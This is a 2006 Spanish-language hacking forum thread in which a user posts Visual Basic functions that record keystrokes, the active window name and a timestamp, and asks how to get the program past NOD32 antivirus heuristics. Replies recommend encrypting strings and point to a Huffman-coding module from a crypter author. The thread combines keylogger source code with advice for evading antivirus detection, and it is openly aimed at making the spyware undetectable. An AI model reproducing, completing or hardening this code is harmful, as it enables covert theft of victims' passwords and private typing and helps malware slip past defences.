Heuristica del NOD

Iniciado por A2Corp, 29 Julio 2006, 07:23 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

A2Corp

29 Julio 2006, 07:23 AM
Hola... Postie algo parecido en Troyanos y Virus, pero aqui lo hare mas centrado en esta funcion...

Necesito que me confirmen....
Si en un Modulo tengo estas 2 funciones:

Código [Seleccionar]

Public Function FireEvent(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String)
    On Error Resume Next
   
    If strInApplication = strLastApplication Then
      Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, False
     
   Else
      Tecla_Presionada intKey, strKeyName, bIsFunctionKey, strInApplication, True
      strLastApplication = strInApplication
   End If
   
End Function


Código [Seleccionar]

Public Function Tecla_Presionada(ByVal intKey As Integer, ByVal strKeyName As String, ByVal bIsFunctionKey As Boolean, ByVal strInApplication As String, ByVal vCambio_De_Aplicacion As Boolean)
        If vCambio_De_Aplicacion Then
        If Not FMain.txt.Text = "" Then
            FMain.txt.Text = FMain.txt.Text & vbNewLine & vbNewLine
        End If
        FMain.txt.Text = FMain.txt.Text & "<hr><b>...:::." & Now & ":::...<br>" & strInApplication & "</b><hr><br>" & vbNewLine
        If bIsFunctionKey Then
            FMain.txt.Text = FMain.txt.Text & strKeyName
        Else
            FMain.txt.Text = FMain.txt.Text & Chr(intKey)
        End If
    Else
        If bIsFunctionKey Then
            FMain.txt.Text = FMain.txt.Text & strKeyName
        Else
            FMain.txt.Text = FMain.txt.Text & Chr(intKey)
        End If
   End If

End Function


Es detectada por la heuristica?

Se puede lograr meter alguna funcion dentro de otra? no verdad?  :huh:

Esto ya me tiene desesperado, no logro burlar la heuristica del NOD!

Se que el problema esta ahi porque si quito alguna parte del code ya no es detectado el EXE pero queda inservible xD
Alguna recomendacion?
Saludos
Hackeo, luego existo...

Krnl64

#1
29 Julio 2006, 17:20 PM
No es esactamente meter una funcion dentro de otra, sino llamar a ejecucion desde una funcion A a otra funcion B.

Porsupuesto  que se puede hacer.

En cuanto como se puede hacer indetectable, en el foro de troyanos y virus creo que te podran orientar mejor.

Una recomendacion, usa strings cifrados

Salu2

_Sergi_

#2
29 Julio 2006, 17:44 PM
Sobre las strings cifradas, hay un post de Kizar, el del Astaroth Joiner que tiene un módulo con el algoritmo de Huffman.

Un saludo
Proyecto de Ingeniero

Gorky

#3
31 Julio 2006, 20:00 PM
Hace no mucho repondi esto mismo en otro post. Supongo que ahi podras informarte.

http://foro.elhacker.net/index.php/topic,126647.msg579870.html#msg579870
Imprimir
Ir Arriba Páginas1
Acciones del Usuario